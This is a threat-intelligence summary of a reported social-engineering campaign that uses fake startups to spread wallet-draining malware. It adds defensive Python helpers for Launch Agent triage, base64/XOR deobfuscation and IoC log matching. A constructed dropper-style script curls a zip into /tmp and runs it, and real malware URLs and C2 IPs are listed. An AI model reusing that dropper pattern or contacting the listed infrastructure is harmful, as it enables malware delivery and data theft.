The article details an ongoing, elaborate social engineering campaign targeting cryptocurrency users, in which threat actors create fake AI, gaming and Web3 startups to lure victims into downloading wallet-draining malware. It highlights the use of compromised X (Twitter) accounts; Notion, Medium and GitHub fronts; cross-platform delivery via Windows Electron apps and macOS DMGs; stolen code-signing certificates; and anti-analysis techniques, with links to groups such as CrazyEvil and the Meeten campaign. #AtomicStealer #EternalDecay #CrazyEvil #MeetenCampaign #CryptoWalletDrain
Keypoints
- Threat actors deploy fake startup campaigns on X, Medium, Notion and GitHub to persuade victims to install wallet-stealing software.
- They exploit compromised verified X accounts to lend legitimacy and reach targets.
- Delivery includes Windows Electron applications and macOS DMGs, sometimes signed with stolen certificates to appear credible.
- The operation uses obfuscation, anti-sandboxing and other anti-analysis techniques, and persists on macOS via a Launch Agent.
- IoCs include dozens of fake company domains, social media profiles, and C2 infrastructure endpoints.
MITRE Techniques
- [T1566.003] Spearphishing via Service – The actors contact victims through social channels to lure them into downloading a malicious binary. ‘Each campaign typically starts with a victim being contacted through X messages, Telegram or Discord.’
- [T1078] Valid Accounts – Attackers exploit compromised X accounts (typically verified) to contact victims and present a legitimate facade. ‘Some of the observed X accounts appear to be compromised accounts that typically are verified and have a higher number of followers and following…’
- [T1553.002] Subvert Trust Controls: Code Signing – Stolen code-signing certificates are used to sign the Windows binaries so they pass signature checks (T1116 is the retired ATT&CK ID for this technique). ‘The certificates of two legitimate companies Jiangyin Fengyuan Electronics Co., Ltd. and Paperbucketmdb ApS (revoked as of June 2025) were used during this campaign.’
- [T1059.002] Command and Scripting Interpreter: AppleScript – AppleScript is used in the macOS deployment chain. ‘AppleScript is being used.’
- [T1027] Obfuscated/Compressed Files and Information – Bash script obfuscated with junk, base64 and XOR’d. ‘The bash script is obfuscated with junk, base64 and is XOR’d.’
- [T1497.001] Virtualization/Sandbox Evasion – Anti‑analysis checks for QEMU, VMware and Docker-OSX. ‘anti-analysis checks for QEMU, VMWare and Docker-OSX…’
- [T1543.001] Create or Modify System Process: Launch Agent – macOS persistence via a Launch Agent that runs the payload at user login. ‘Launch Agent to run at login.’
- [T1555.003] Credentials from Web Browsers – Information stealer targets browser data and crypto wallets. ‘steal data from stores including browser data, crypto wallets, cookies and documents.’
- [T1041] Exfiltration Over C2 Channel – Stolen data is compressed and POSTed to the C2 server. ‘data is compressed into /tmp/out.zip and sent via POST request to 45[.]94[.]47[.]167/contact.’
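A triage helper for the two macOS stages listed above, the Launch Agent persistence (T1543.001) and the junk/base64/XOR-obfuscated bash script (T1027), added here as an example; it is not code from the Darktrace report or from the malware. The plist, its Label and script path, the sample script, the junk characters and the XOR key 0x5A are all constructed. It assumes the junk sits outside the base64 alphabet and that the XOR key is a single byte; the report states neither, so adjust the peeling step to the real sample.

```python
import base64
import plistlib
import re
import string

# ---- T1543.001: triage a user Launch Agent plist -------------------------
# Constructed plist (hypothetical Label and script path, not from the report).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key>
  <array>
    <string>/bin/bash</string>
    <string>/Users/victim/.helper/install.sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

INTERPRETERS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/usr/bin/osascript", "/usr/bin/python3"}
HIDDEN_OR_TEMP = re.compile(r"^(/private)?/tmp/|^/var/folders/|^/Users/[^/]+/\.")

def triage_launch_agent(plist_bytes):
    """Return (suspicious, reasons). RunAtLoad combined with an interpreter
    launcher or a program in a temp/hidden user path is the pattern to hunt."""
    p = plistlib.loads(plist_bytes)
    args = p.get("ProgramArguments") or [p.get("Program", "")]
    reasons = []
    if p.get("RunAtLoad"):
        reasons.append("RunAtLoad: runs at every login")
    if args[0] in INTERPRETERS:
        reasons.append(f"launches an interpreter: {args[0]}")
    for a in args:
        if HIDDEN_OR_TEMP.search(a):
            reasons.append(f"program in temp or hidden user path: {a}")
    return len(reasons) >= 2, reasons

# ---- T1027: peel a junk + base64 + single-byte XOR layer ------------------
def xor_bytes(data, key):
    return bytes(b ^ key for b in data)

def shell_score(data):
    """Heuristic: printable fraction plus a bonus per shell token seen."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return 0.0
    printable = sum(c in string.printable for c in text) / max(len(text), 1)
    tokens = sum(t in text for t in ("#!/bin/", "curl", "chmod", "/tmp/", "unzip", "osascript"))
    return printable + 0.5 * tokens

def peel_base64_xor(blob):
    """Drop junk outside the base64 alphabet (an assumption about how the junk
    was added), base64-decode, then brute-force the single-byte XOR key by score."""
    cleaned = re.sub(rb"[^A-Za-z0-9+/=]", b"", blob)
    raw = base64.b64decode(cleaned)
    key = max(range(256), key=lambda k: shell_score(xor_bytes(raw, k)))
    return key, xor_bytes(raw, key)

# Constructed sample: a dropper-style script XOR'd with 0x5A, base64'd, then
# '#~' junk sprinkled every seven characters. Not the real script from the report.
PLAINTEXT = (b"#!/bin/bash\n"
             b"curl -s https://example.invalid/app.zip -o /tmp/app.zip\n"
             b"cd /tmp && unzip -o app.zip && chmod +x install.sh && ./install.sh\n")

def make_sample(plaintext, key=0x5A):
    b64 = base64.b64encode(xor_bytes(plaintext, key))
    out = bytearray()
    for i, ch in enumerate(b64):
        out.append(ch)
        if i % 7 == 6:
            out += b"#~"
    return bytes(out)

OBFUSCATED_SAMPLE = make_sample(PLAINTEXT)

if __name__ == "__main__":
    print(triage_launch_agent(SAMPLE_PLIST))
    key, script = peel_base64_xor(OBFUSCATED_SAMPLE)
    print(hex(key), script.decode())
```

The scoring deliberately rewards shell tokens rather than printable bytes alone: XORing ASCII text with a key below 0x80 yields mostly printable output for many wrong keys, so a printability check by itself does not pick out the right one.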
Indicators of Compromise
- [Domain] Manboon[.]com, gaetanorealty[.]com, Troveur[.]com, Bigpinellas[.]com, Dsandbox[.]com, Conceptwo[.]com, Aceartist[.]com, turismoelcasco[.]com, Ekodirect[.]com
- [URL] https://mrajhhosdoahjsd[.]com, https://isnimitz[.]com/zxc/app[.]zip
- [IP] 45[.]94[.]47[.]112, 45[.]94[.]47[.]167, 77[.]73[.]129[.]18
- [File] app.zip, install.sh, SwoxApp, InstallerHelper.app
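An IoC matcher over proxy log lines, added here as an example and not part of the report: it refangs the domains and IPs listed above, matches hosts on a label boundary so a lookalike such as notmanboon.com is not a false positive, and tags a POST to /contact on a listed IP as the exfiltration pattern the report describes. The log format and every log line are constructed for the example.

```python
import ipaddress
import re

# Indicators as published (defanged with [.]); refanged below for matching.
DOMAINS = ["Manboon[.]com", "gaetanorealty[.]com", "Troveur[.]com", "Bigpinellas[.]com",
           "Dsandbox[.]com", "Conceptwo[.]com", "Aceartist[.]com", "turismoelcasco[.]com",
           "Ekodirect[.]com", "mrajhhosdoahjsd[.]com", "isnimitz[.]com"]
IPS = ["45[.]94[.]47[.]112", "45[.]94[.]47[.]167", "77[.]73[.]129[.]18"]

def refang(ioc):
    return ioc.replace("[.]", ".").replace("hxxp", "http").lower()

IOC_DOMAINS = {refang(d) for d in DOMAINS}
IOC_IPS = {refang(i) for i in IPS}

# Constructed proxy log: "ts client method host path status" (not a real format).
SAMPLE_LOG = """2025-06-10T09:12:01Z 10.0.0.5 GET www.apple.com /index.html 200
2025-06-10T09:14:33Z 10.0.0.7 GET isnimitz.com /zxc/app.zip 200
2025-06-10T09:15:02Z 10.0.0.7 POST 45.94.47.167 /contact 200
2025-06-10T09:16:40Z 10.0.0.9 GET cdn.manboon.com /logo.png 200
2025-06-10T09:17:11Z 10.0.0.5 GET notmanboon.com /index.html 200
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) "
                     r"(?P<host>\S+) (?P<path>\S+) (?P<status>\d+)$")

def host_matches(host, domains):
    """Exact match or subdomain of an IoC domain, on a label boundary."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)

def scan(log_text):
    """Return (client, host, path, tags) for every line touching an indicator."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the scan
        host, tags = m["host"], []
        if host_matches(host, IOC_DOMAINS):
            tags.append("ioc-domain")
        try:
            if str(ipaddress.ip_address(host)) in IOC_IPS:
                tags.append("ioc-ip")
        except ValueError:
            pass  # host is a name, not an IP literal
        if "ioc-ip" in tags and m["method"] == "POST" and m["path"] == "/contact":
            tags.append("possible-exfil")  # the reported POST of /tmp/out.zip to /contact
        if tags:
            hits.append((m["client"], host, m["path"], tags))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Run it against a real proxy export by replacing SAMPLE_LOG and LINE_RE with the export's own format; the matching and tagging logic does not depend on the constructed layout.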
Read more: https://darktrace.com/blog/crypto-wallets-continue-to-be-drained-in-elaborate-social-media-scam